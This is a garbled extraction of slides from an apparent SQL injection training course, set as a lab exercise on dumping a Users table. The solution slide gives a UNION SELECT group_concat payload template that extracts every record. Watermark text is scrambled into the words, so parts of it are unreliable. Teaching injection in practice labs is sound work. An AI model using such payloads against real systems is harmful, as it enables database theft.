y .

c o m s ki
Exdeertm
b o r
e i t h Sam
y of K
Advanced
Perso n a l p ropSQL
l_my6
9@ yah Injection
o om
o.c
Dump tables

Copyright © Exdemy.com
Dump Users table using SQL Injection
● Dump (i.e. download all the records of) the Users table in SQLi Labs

y . c o m s ki
Exdeertm
b o r
e i t h Sam
y of K
n a l p rop yah oo.com
Perso l_my6
9@

Copyright © Exdemy.com
Dump Users table using SQL Injection - Solution
● For dumping data, we need to use a MySQL function called group_concat to
concatenate all the result
y. c
mothis: o m r s ki
Exdeerlike
○ Then the vulnerable app shows it in the output b o
e i t h Sam
● So the injected query will something ty f K
○ n a l p rop
UNION SELECT 1, .., group_concat(Column1, ya hom
0x3a, .c
ooColumn2, ..) from TABLE
P e r so m y 6 9@
■ 0x3a is as same as colon l_
● Here you can see how we dump users table using SQL Injection:

Copyright © Exdemy.com
 y . c o m s ki
Exdeertm
b o r
e i t h Sam
y of K
n a l p rop yah oo.com
Perso l_my6
9@

Copyright © Exdemy.com